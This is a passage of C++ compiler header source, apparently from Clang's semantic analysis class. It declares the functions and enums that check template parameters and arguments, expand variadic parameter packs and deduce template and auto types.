bool resolveAssumedTemplateNameAsType(Scope *S, TemplateName &Name,
SourceLocation NameLoc,
bool Diagnose = true);
/// Determine whether a particular identifier might be the name in a C++1z
/// deduction-guide declaration.
bool isDeductionGuideName(Scope *S, const IdentifierInfo &Name,
SourceLocation NameLoc,
ParsedTemplateTy *Template = nullptr);
bool DiagnoseUnknownTemplateName(const IdentifierInfo &II,
SourceLocation IILoc,
Scope *S,
const CXXScopeSpec *SS,
TemplateTy &SuggestedTemplate,
TemplateNameKind &SuggestedKind);
bool DiagnoseUninstantiableTemplate(SourceLocation PointOfInstantiation,
NamedDecl *Instantiation,
bool InstantiatedFromMember,
const NamedDecl *Pattern,
const NamedDecl *PatternDef,
TemplateSpecializationKind TSK,
bool Complain = true);
void DiagnoseTemplateParameterShadow(SourceLocation Loc, Decl *PrevDecl);
TemplateDecl *AdjustDeclIfTemplate(Decl *&Decl);
NamedDecl *ActOnTypeParameter(Scope *S, bool Typename,
SourceLocation EllipsisLoc,
SourceLocation KeyLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth, unsigned Position,
SourceLocation EqualLoc,
ParsedType DefaultArg);
QualType CheckNonTypeTemplateParameterType(TypeSourceInfo *&TSI,
SourceLocation Loc);
QualType CheckNonTypeTemplateParameterType(QualType T, SourceLocation Loc);
NamedDecl *ActOnNonTypeTemplateParameter(Scope *S, Declarator &D,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
Expr *DefaultArg);
NamedDecl *ActOnTemplateTemplateParameter(Scope *S,
SourceLocation TmpLoc,
TemplateParameterList *Params,
SourceLocation EllipsisLoc,
IdentifierInfo *ParamName,
SourceLocation ParamNameLoc,
unsigned Depth,
unsigned Position,
SourceLocation EqualLoc,
ParsedTemplateArgument DefaultArg);
TemplateParameterList *
ActOnTemplateParameterList(unsigned Depth,
SourceLocation ExportLoc,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> Params,
SourceLocation RAngleLoc,
Expr *RequiresClause);
/// The context in which we are checking a template parameter list.
enum TemplateParamListContext {
TPC_ClassTemplate,
TPC_VarTemplate,
TPC_FunctionTemplate,
TPC_ClassTemplateMember,
TPC_FriendClassTemplate,
TPC_FriendFunctionTemplate,
TPC_FriendFunctionTemplateDefinition,
TPC_TypeAliasTemplate
};
bool CheckTemplateParameterList(TemplateParameterList *NewParams,
TemplateParameterList *OldParams,
TemplateParamListContext TPC,
SkipBodyInfo *SkipBody = nullptr);
TemplateParameterList *MatchTemplateParametersToScopeSpecifier(
SourceLocation DeclStartLoc, SourceLocation DeclLoc,
const CXXScopeSpec &SS, TemplateIdAnnotation *TemplateId,
ArrayRef<TemplateParameterList *> ParamLists,
bool IsFriend, bool &IsMemberSpecialization, bool &Invalid);
DeclResult CheckClassTemplate(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name, SourceLocation NameLoc,
const ParsedAttributesView &Attr, TemplateParameterList *TemplateParams,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
SourceLocation FriendLoc, unsigned NumOuterTemplateParamLists,
TemplateParameterList **OuterTemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
TemplateArgumentLoc getTrivialTemplateArgumentLoc(const TemplateArgument &Arg,
QualType NTTPType,
SourceLocation Loc);
/// Get a template argument mapping the given template parameter to itself,
/// e.g. for X in \c template<int X>, this would return an expression template
/// argument referencing X.
TemplateArgumentLoc getIdentityTemplateArgumentLoc(Decl *Param,
SourceLocation Location);
void translateTemplateArguments(const ASTTemplateArgsPtr &In,
TemplateArgumentListInfo &Out);
ParsedTemplateArgument ActOnTemplateTypeArgument(TypeResult ParsedType);
void NoteAllFoundTemplates(TemplateName Name);
QualType CheckTemplateIdType(TemplateName Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs);
TypeResult
ActOnTemplateIdType(Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
TemplateTy Template, IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc, SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs, SourceLocation RAngleLoc,
bool IsCtorOrDtorName = false, bool IsClassName = false);
/// Parsed an elaborated-type-specifier that refers to a template-id,
/// such as \c class T::template apply<U>.
TypeResult ActOnTagTemplateIdType(TagUseKind TUK,
TypeSpecifierType TagSpec,
SourceLocation TagLoc,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateD,
SourceLocation TemplateLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgsIn,
SourceLocation RAngleLoc);
DeclResult ActOnVarTemplateSpecialization(
Scope *S, Declarator &D, TypeSourceInfo *DI,
SourceLocation TemplateKWLoc, TemplateParameterList *TemplateParams,
StorageClass SC, bool IsPartialSpecialization);
DeclResult CheckVarTemplateId(VarTemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation TemplateNameLoc,
const TemplateArgumentListInfo &TemplateArgs);
ExprResult CheckVarTemplateId(const CXXScopeSpec &SS,
const DeclarationNameInfo &NameInfo,
VarTemplateDecl *Template,
SourceLocation TemplateLoc,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult
CheckConceptTemplateId(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
SourceLocation ConceptNameLoc, NamedDecl *FoundDecl,
ConceptDecl *NamedConcept,
const TemplateArgumentListInfo *TemplateArgs);
void diagnoseMissingTemplateArguments(TemplateName Name, SourceLocation Loc);
ExprResult BuildTemplateIdExpr(const CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
LookupResult &R,
bool RequiresADL,
const TemplateArgumentListInfo *TemplateArgs);
ExprResult BuildQualifiedTemplateIdExpr(CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
const DeclarationNameInfo &NameInfo,
const TemplateArgumentListInfo *TemplateArgs);
TemplateNameKind ActOnDependentTemplateName(
Scope *S, CXXScopeSpec &SS, SourceLocation TemplateKWLoc,
const UnqualifiedId &Name, ParsedType ObjectType, bool EnteringContext,
TemplateTy &Template, bool AllowInjectedClassName = false);
DeclResult ActOnClassTemplateSpecialization(
Scope *S, unsigned TagSpec, TagUseKind TUK, SourceLocation KWLoc,
SourceLocation ModulePrivateLoc, TemplateIdAnnotation &TemplateId,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TemplateParameterLists,
SkipBodyInfo *SkipBody = nullptr);
bool CheckTemplatePartialSpecializationArgs(SourceLocation Loc,
TemplateDecl *PrimaryTemplate,
unsigned NumExplicitArgs,
ArrayRef<TemplateArgument> Args);
void CheckTemplatePartialSpecialization(
ClassTemplatePartialSpecializationDecl *Partial);
void CheckTemplatePartialSpecialization(
VarTemplatePartialSpecializationDecl *Partial);
Decl *ActOnTemplateDeclarator(Scope *S,
MultiTemplateParamsArg TemplateParameterLists,
Declarator &D);
bool
CheckSpecializationInstantiationRedecl(SourceLocation NewLoc,
TemplateSpecializationKind NewTSK,
NamedDecl *PrevDecl,
TemplateSpecializationKind PrevTSK,
SourceLocation PrevPtOfInstantiation,
bool &SuppressNew);
bool CheckDependentFunctionTemplateSpecialization(FunctionDecl *FD,
const TemplateArgumentListInfo &ExplicitTemplateArgs,
LookupResult &Previous);
bool CheckFunctionTemplateSpecialization(
FunctionDecl *FD, TemplateArgumentListInfo *ExplicitTemplateArgs,
LookupResult &Previous, bool QualifiedFriend = false);
bool CheckMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
void CompleteMemberSpecialization(NamedDecl *Member, LookupResult &Previous);
DeclResult ActOnExplicitInstantiation(
Scope *S, SourceLocation ExternLoc, SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc, const CXXScopeSpec &SS,
TemplateTy Template, SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc, ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc, const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S, SourceLocation ExternLoc,
SourceLocation TemplateLoc,
unsigned TagSpec, SourceLocation KWLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr);
DeclResult ActOnExplicitInstantiation(Scope *S,
SourceLocation ExternLoc,
SourceLocation TemplateLoc,
Declarator &D);
TemplateArgumentLoc
SubstDefaultTemplateArgumentIfAvailable(TemplateDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
Decl *Param,
SmallVectorImpl<TemplateArgument>
&Converted,
bool &HasDefaultArg);
/// Specifies the context in which a particular template
/// argument is being checked.
enum CheckTemplateArgumentKind {
/// The template argument was specified in the code or was
/// instantiated with some deduced template arguments.
CTAK_Specified,
/// The template argument was deduced via template argument
/// deduction.
CTAK_Deduced,
/// The template argument was deduced from an array bound
/// via template argument deduction.
CTAK_DeducedFromArrayBound
};
bool CheckTemplateArgument(NamedDecl *Param,
TemplateArgumentLoc &Arg,
NamedDecl *Template,
SourceLocation TemplateLoc,
SourceLocation RAngleLoc,
unsigned ArgumentPackIndex,
SmallVectorImpl<TemplateArgument> &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
/// Check that the given template arguments can be be provided to
/// the given template, converting the arguments along the way.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateLoc The location of the template name in the source.
///
/// \param TemplateArgs The list of template arguments. If the template is
/// a template template parameter, this function may extend the set of
/// template arguments to also include substituted, defaulted template
/// arguments.
///
/// \param PartialTemplateArgs True if the list of template arguments is
/// intentionally partial, e.g., because we're checking just the initial
/// set of template arguments.
///
/// \param Converted Will receive the converted, canonicalized template
/// arguments.
///
/// \param UpdateArgsWithConversions If \c true, update \p TemplateArgs to
/// contain the converted forms of the template arguments as written.
/// Otherwise, \p TemplateArgs will not be modified.
///
/// \param ConstraintsNotSatisfied If provided, and an error occured, will
/// receive true if the cause for the error is the associated constraints of
/// the template not being satisfied by the template arguments.
///
/// \returns true if an error occurred, false otherwise.
bool CheckTemplateArgumentList(TemplateDecl *Template,
SourceLocation TemplateLoc,
TemplateArgumentListInfo &TemplateArgs,
bool PartialTemplateArgs,
SmallVectorImpl<TemplateArgument> &Converted,
bool UpdateArgsWithConversions = true,
bool *ConstraintsNotSatisfied = nullptr);
bool CheckTemplateTypeArgument(TemplateTypeParmDecl *Param,
TemplateArgumentLoc &Arg,
SmallVectorImpl<TemplateArgument> &Converted);
bool CheckTemplateArgument(TemplateTypeParmDecl *Param,
TypeSourceInfo *Arg);
ExprResult CheckTemplateArgument(NonTypeTemplateParmDecl *Param,
QualType InstantiatedParamType, Expr *Arg,
TemplateArgument &Converted,
CheckTemplateArgumentKind CTAK = CTAK_Specified);
bool CheckTemplateTemplateArgument(TemplateParameterList *Params,
TemplateArgumentLoc &Arg);
ExprResult
BuildExpressionFromDeclTemplateArgument(const TemplateArgument &Arg,
QualType ParamType,
SourceLocation Loc);
ExprResult
BuildExpressionFromIntegralTemplateArgument(const TemplateArgument &Arg,
SourceLocation Loc);
/// Enumeration describing how template parameter lists are compared
/// for equality.
enum TemplateParameterListEqualKind {
/// We are matching the template parameter lists of two templates
/// that might be redeclarations.
///
/// \code
/// template<typename T> struct X;
/// template<typename T> struct X;
/// \endcode
TPL_TemplateMatch,
/// We are matching the template parameter lists of two template
/// template parameters as part of matching the template parameter lists
/// of two templates that might be redeclarations.
///
/// \code
/// template<template<int I> class TT> struct X;
/// template<template<int Value> class Other> struct X;
/// \endcode
TPL_TemplateTemplateParmMatch,
/// We are matching the template parameter lists of a template
/// template argument against the template parameter lists of a template
/// template parameter.
///
/// \code
/// template<template<int Value> class Metafun> struct X;
/// template<int Value> struct integer_c;
/// X<integer_c> xic;
/// \endcode
TPL_TemplateTemplateArgumentMatch
};
bool TemplateParameterListsAreEqual(TemplateParameterList *New,
TemplateParameterList *Old,
bool Complain,
TemplateParameterListEqualKind Kind,
SourceLocation TemplateArgLoc
= SourceLocation());
bool CheckTemplateDeclScope(Scope *S, TemplateParameterList *TemplateParams);
/// Called when the parser has parsed a C++ typename
/// specifier, e.g., "typename T::type".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param II the identifier we're retrieving (e.g., 'type' in the example).
/// \param IdLoc the location of the identifier.
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS, const IdentifierInfo &II,
SourceLocation IdLoc);
/// Called when the parser has parsed a C++ typename
/// specifier that ends in a template-id, e.g.,
/// "typename MetaFun::template apply<T1, T2>".
///
/// \param S The scope in which this typename type occurs.
/// \param TypenameLoc the location of the 'typename' keyword
/// \param SS the nested-name-specifier following the typename (e.g., 'T::').
/// \param TemplateLoc the location of the 'template' keyword, if any.
/// \param TemplateName The template name.
/// \param TemplateII The identifier used to name the template.
/// \param TemplateIILoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
TypeResult
ActOnTypenameType(Scope *S, SourceLocation TypenameLoc,
const CXXScopeSpec &SS,
SourceLocation TemplateLoc,
TemplateTy TemplateName,
IdentifierInfo *TemplateII,
SourceLocation TemplateIILoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc);
QualType CheckTypenameType(ElaboratedTypeKeyword Keyword,
SourceLocation KeywordLoc,
NestedNameSpecifierLoc QualifierLoc,
const IdentifierInfo &II,
SourceLocation IILoc);
TypeSourceInfo *RebuildTypeInCurrentInstantiation(TypeSourceInfo *T,
SourceLocation Loc,
DeclarationName Name);
bool RebuildNestedNameSpecifierInCurrentInstantiation(CXXScopeSpec &SS);
ExprResult RebuildExprInCurrentInstantiation(Expr *E);
bool RebuildTemplateParamsInCurrentInstantiation(
TemplateParameterList *Params);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgumentList &Args);
std::string
getTemplateArgumentBindingsText(const TemplateParameterList *Params,
const TemplateArgument *Args,
unsigned NumArgs);
// Concepts
Decl *ActOnConceptDefinition(
Scope *S, MultiTemplateParamsArg TemplateParameterLists,
IdentifierInfo *Name, SourceLocation NameLoc, Expr *ConstraintExpr);
//===--------------------------------------------------------------------===//
// C++ Variadic Templates (C++0x [temp.variadic])
//===--------------------------------------------------------------------===//
/// Determine whether an unexpanded parameter pack might be permitted in this
/// location. Useful for error recovery.
bool isUnexpandedParameterPackPermitted();
/// The context in which an unexpanded parameter pack is
/// being diagnosed.
///
/// Note that the values of this enumeration line up with the first
/// argument to the \c err_unexpanded_parameter_pack diagnostic.
enum UnexpandedParameterPackContext {
/// An arbitrary expression.
UPPC_Expression = 0,
/// The base type of a class type.
UPPC_BaseType,
/// The type of an arbitrary declaration.
UPPC_DeclarationType,
/// The type of a data member.
UPPC_DataMemberType,
/// The size of a bit-field.
UPPC_BitFieldWidth,
/// The expression in a static assertion.
UPPC_StaticAssertExpression,
/// The fixed underlying type of an enumeration.
UPPC_FixedUnderlyingType,
/// The enumerator value.
UPPC_EnumeratorValue,
/// A using declaration.
UPPC_UsingDeclaration,
/// A friend declaration.
UPPC_FriendDeclaration,
/// A declaration qualifier.
UPPC_DeclarationQualifier,
/// An initializer.
UPPC_Initializer,
/// A default argument.
UPPC_DefaultArgument,
/// The type of a non-type template parameter.
UPPC_NonTypeTemplateParameterType,
/// The type of an exception.
UPPC_ExceptionType,
/// Partial specialization.
UPPC_PartialSpecialization,
/// Microsoft __if_exists.
UPPC_IfExists,
/// Microsoft __if_not_exists.
UPPC_IfNotExists,
/// Lambda expression.
UPPC_Lambda,
/// Block expression,
UPPC_Block
};
/// Diagnose unexpanded parameter packs.
///
/// \param Loc The location at which we should emit the diagnostic.
///
/// \param UPPC The context in which we are diagnosing unexpanded
/// parameter packs.
///
/// \param Unexpanded the set of unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPacks(SourceLocation Loc,
UnexpandedParameterPackContext UPPC,
ArrayRef<UnexpandedParameterPack> Unexpanded);
/// If the given type contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The source location where a diagnostc should be emitted.
///
/// \param T The type that is being checked for unexpanded parameter
/// packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc, TypeSourceInfo *T,
UnexpandedParameterPackContext UPPC);
/// If the given expression contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param E The expression that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(Expr *E,
UnexpandedParameterPackContext UPPC = UPPC_Expression);
/// If the given nested-name-specifier contains an unexpanded
/// parameter pack, diagnose the error.
///
/// \param SS The nested-name-specifier that is being checked for
/// unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const CXXScopeSpec &SS,
UnexpandedParameterPackContext UPPC);
/// If the given name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param NameInfo The name (with source location information) that
/// is being checked for unexpanded parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(const DeclarationNameInfo &NameInfo,
UnexpandedParameterPackContext UPPC);
/// If the given template name contains an unexpanded parameter pack,
/// diagnose the error.
///
/// \param Loc The location of the template name.
///
/// \param Template The template name that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(SourceLocation Loc,
TemplateName Template,
UnexpandedParameterPackContext UPPC);
/// If the given template argument contains an unexpanded parameter
/// pack, diagnose the error.
///
/// \param Arg The template argument that is being checked for unexpanded
/// parameter packs.
///
/// \returns true if an error occurred, false otherwise.
bool DiagnoseUnexpandedParameterPack(TemplateArgumentLoc Arg,
UnexpandedParameterPackContext UPPC);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgument Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// template argument.
///
/// \param Arg The template argument that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TemplateArgumentLoc Arg,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param T The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(QualType T,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// type.
///
/// \param TL The type that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(TypeLoc TL,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// nested-name-specifier.
///
/// \param NNS The nested-name-specifier that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(NestedNameSpecifierLoc NNS,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Collect the set of unexpanded parameter packs within the given
/// name.
///
/// \param NameInfo The name that will be traversed to find
/// unexpanded parameter packs.
void collectUnexpandedParameterPacks(const DeclarationNameInfo &NameInfo,
SmallVectorImpl<UnexpandedParameterPack> &Unexpanded);
/// Invoked when parsing a template argument followed by an
/// ellipsis, which creates a pack expansion.
///
/// \param Arg The template argument preceding the ellipsis, which
/// may already be invalid.
///
/// \param EllipsisLoc The location of the ellipsis.
ParsedTemplateArgument ActOnPackExpansion(const ParsedTemplateArgument &Arg,
SourceLocation EllipsisLoc);
/// Invoked when parsing a type followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Type The type preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
TypeResult ActOnPackExpansion(ParsedType Type, SourceLocation EllipsisLoc);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
TypeSourceInfo *CheckPackExpansion(TypeSourceInfo *Pattern,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Construct a pack expansion type from the pattern of the pack
/// expansion.
QualType CheckPackExpansion(QualType Pattern,
SourceRange PatternRange,
SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult ActOnPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc);
/// Invoked when parsing an expression followed by an ellipsis, which
/// creates a pack expansion.
///
/// \param Pattern The expression preceding the ellipsis, which will become
/// the pattern of the pack expansion.
///
/// \param EllipsisLoc The location of the ellipsis.
ExprResult CheckPackExpansion(Expr *Pattern, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions);
/// Determine whether we could expand a pack expansion with the
/// given set of parameter packs into separate arguments by repeatedly
/// transforming the pattern.
///
/// \param EllipsisLoc The location of the ellipsis that identifies the
/// pack expansion.
///
/// \param PatternRange The source range that covers the entire pattern of
/// the pack expansion.
///
/// \param Unexpanded The set of unexpanded parameter packs within the
/// pattern.
///
/// \param ShouldExpand Will be set to \c true if the transformer should
/// expand the corresponding pack expansions into separate arguments. When
/// set, \c NumExpansions must also be set.
///
/// \param RetainExpansion Whether the caller should add an unexpanded
/// pack expansion after all of the expanded arguments. This is used
/// when extending explicitly-specified template argument packs per
/// C++0x [temp.arg.explicit]p9.
///
/// \param NumExpansions The number of separate arguments that will be in
/// the expanded form of the corresponding pack expansion. This is both an
/// input and an output parameter, which can be set by the caller if the
/// number of expansions is known a priori (e.g., due to a prior substitution)
/// and will be set by the callee when the number of expansions is known.
/// The callee must set this value when \c ShouldExpand is \c true; it may
/// set this value in other cases.
///
/// \returns true if an error occurred (e.g., because the parameter packs
/// are to be instantiated with arguments of different lengths), false
/// otherwise. If false, \c ShouldExpand (and possibly \c NumExpansions)
/// must be set.
bool CheckParameterPacksForExpansion(SourceLocation EllipsisLoc,
SourceRange PatternRange,
ArrayRef<UnexpandedParameterPack> Unexpanded,
const MultiLevelTemplateArgumentList &TemplateArgs,
bool &ShouldExpand,
bool &RetainExpansion,
Optional<unsigned> &NumExpansions);
/// Determine the number of arguments in the given pack expansion
/// type.
///
/// This routine assumes that the number of arguments in the expansion is
/// consistent across all of the unexpanded parameter packs in its pattern.
///
/// Returns an empty Optional if the type can't be expanded.
Optional<unsigned> getNumArgumentsInExpansion(QualType T,
const MultiLevelTemplateArgumentList &TemplateArgs);
/// Determine whether the given declarator contains any unexpanded
/// parameter packs.
///
/// This routine is used by the parser to disambiguate function declarators
/// with an ellipsis prior to the ')', e.g.,
///
/// \code
/// void f(T...);
/// \endcode
///
/// To determine whether we have an (unnamed) function parameter pack or
/// a variadic function.
///
/// \returns true if the declarator contains any unexpanded parameter packs,
/// false otherwise.
bool containsUnexpandedParameterPacks(Declarator &D);
/// Returns the pattern of the pack expansion for a template argument.
///
/// \param OrigLoc The template argument to expand.
///
/// \param Ellipsis Will be set to the location of the ellipsis.
///
/// \param NumExpansions Will be set to the number of expansions that will
/// be generated from this pack expansion, if known a priori.
TemplateArgumentLoc getTemplateArgumentPackExpansionPattern(
TemplateArgumentLoc OrigLoc,
SourceLocation &Ellipsis,
Optional<unsigned> &NumExpansions) const;
/// Given a template argument that contains an unexpanded parameter pack, but
/// which has already been substituted, attempt to determine the number of
/// elements that will be produced once this argument is fully-expanded.
///
/// This is intended for use when transforming 'sizeof...(Arg)' in order to
/// avoid actually expanding the pack where possible.
Optional<unsigned> getFullyPackExpandedSize(TemplateArgument Arg);
//===--------------------------------------------------------------------===//
// C++ Template Argument Deduction (C++ [temp.deduct])
//===--------------------------------------------------------------------===//
/// Adjust the type \p ArgFunctionType to match the calling convention,
/// noreturn, and optionally the exception specification of \p FunctionType.
/// Deduction often wants to ignore these properties when matching function
/// types.
QualType adjustCCAndNoReturn(QualType ArgFunctionType, QualType FunctionType,
bool AdjustExceptionSpec = false);
/// Describes the result of template argument deduction.
///
/// The TemplateDeductionResult enumeration describes the result of
/// template argument deduction, as returned from
/// DeduceTemplateArguments(). The separate TemplateDeductionInfo
/// structure provides additional information about the results of
/// template argument deduction, e.g., the deduced template argument
/// list (if successful) or the specific template parameters or
/// deduced arguments that were involved in the failure.
enum TemplateDeductionResult {
/// Template argument deduction was successful.
TDK_Success = 0,
/// The declaration was invalid; do nothing.
TDK_Invalid,
/// Template argument deduction exceeded the maximum template
/// instantiation depth (which has already been diagnosed).
TDK_InstantiationDepth,
/// Template argument deduction did not deduce a value
/// for every template parameter.
TDK_Incomplete,
/// Template argument deduction did not deduce a value for every
/// expansion of an expanded template parameter pack.
TDK_IncompletePack,
/// Template argument deduction produced inconsistent
/// deduced values for the given template parameter.
TDK_Inconsistent,
/// Template argument deduction failed due to inconsistent
/// cv-qualifiers on a template parameter type that would
/// otherwise be deduced, e.g., we tried to deduce T in "const T"
/// but were given a non-const "X".
TDK_Underqualified,
/// Substitution of the deduced template argument values
/// resulted in an error.
TDK_SubstitutionFailure,
/// After substituting deduced template arguments, a dependent
/// parameter type did not match the corresponding argument.
TDK_DeducedMismatch,
/// After substituting deduced template arguments, an element of
/// a dependent parameter type did not match the corresponding element
/// of the corresponding argument (when deducing from an initializer list).
TDK_DeducedMismatchNested,
/// A non-depnedent component of the parameter did not match the
/// corresponding component of the argument.
TDK_NonDeducedMismatch,
/// When performing template argument deduction for a function
/// template, there were too many call arguments.
TDK_TooManyArguments,
/// When performing template argument deduction for a function
/// template, there were too few call arguments.
TDK_TooFewArguments,
/// The explicitly-specified template arguments were not valid
/// template arguments for the given template.
TDK_InvalidExplicitArguments,
/// Checking non-dependent argument conversions failed.
TDK_NonDependentConversionFailure,
/// The deduced arguments did not satisfy the constraints associated
/// with the template.
TDK_ConstraintsNotSatisfied,
/// Deduction failed; that's all we know.
TDK_MiscellaneousDeductionFailure,
/// CUDA Target attributes do not match.
TDK_CUDATargetMismatch
};
TemplateDeductionResult
DeduceTemplateArguments(ClassTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(VarTemplatePartialSpecializationDecl *Partial,
const TemplateArgumentList &TemplateArgs,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult SubstituteExplicitTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo &ExplicitTemplateArgs,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
SmallVectorImpl<QualType> &ParamTypes, QualType *FunctionType,
sema::TemplateDeductionInfo &Info);
/// brief A function argument from which we performed template argument
// deduction for a call.
struct OriginalCallArg {
OriginalCallArg(QualType OriginalParamType, bool DecomposedParam,
unsigned ArgIdx, QualType OriginalArgType)
: OriginalParamType(OriginalParamType),
DecomposedParam(DecomposedParam), ArgIdx(ArgIdx),
OriginalArgType(OriginalArgType) {}
QualType OriginalParamType;
bool DecomposedParam;
unsigned ArgIdx;
QualType OriginalArgType;
};
TemplateDeductionResult FinishTemplateArgumentDeduction(
FunctionTemplateDecl *FunctionTemplate,
SmallVectorImpl<DeducedTemplateArgument> &Deduced,
unsigned NumExplicitlySpecified, FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
SmallVectorImpl<OriginalCallArg> const *OriginalCallArgs = nullptr,
bool PartialOverloading = false,
llvm::function_ref<bool()> CheckNonDependent = []{ return false; });
TemplateDeductionResult DeduceTemplateArguments(
FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs, ArrayRef<Expr *> Args,
FunctionDecl *&Specialization, sema::TemplateDeductionInfo &Info,
bool PartialOverloading,
llvm::function_ref<bool(ArrayRef<QualType>)> CheckNonDependent);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
QualType ArgFunctionType,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
QualType ToType,
CXXConversionDecl *&Specialization,
sema::TemplateDeductionInfo &Info);
TemplateDeductionResult
DeduceTemplateArguments(FunctionTemplateDecl *FunctionTemplate,
TemplateArgumentListInfo *ExplicitTemplateArgs,
FunctionDecl *&Specialization,
sema::TemplateDeductionInfo &Info,
bool IsAddressOfFunction = false);
/// Substitute Replacement for \p auto in \p TypeWithAuto
QualType SubstAutoType(QualType TypeWithAuto, QualType Replacement);
/// Substitute Replacement for auto in TypeWithAuto
TypeSourceInfo* SubstAutoTypeSourceInfo(TypeSourceInfo *TypeWithAuto,
QualType Replacement);
/// Completely replace the \c auto in \p TypeWithAuto by
/// \p Replacement. This does not retain any \c auto type sugar.
QualType ReplaceAutoType(QualType TypeWithAuto, QualType Replacement);
/// Result type of DeduceAutoType.
enum DeduceAutoResult {
DAR_Succeeded,
DAR_Failed,
DAR_FailedAlreadyDiagnosed
};
DeduceAutoResult
DeduceAutoType(TypeSourceInfo *AutoType, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None);
DeduceAutoResult
DeduceAutoType(TypeLoc AutoTypeLoc, Expr *&Initializer, QualType &Result,
Optional<unsigned> DependentDeductionDepth = None);
void DiagnoseAutoDeductionFailure(VarDecl *VDecl, Expr *Init);
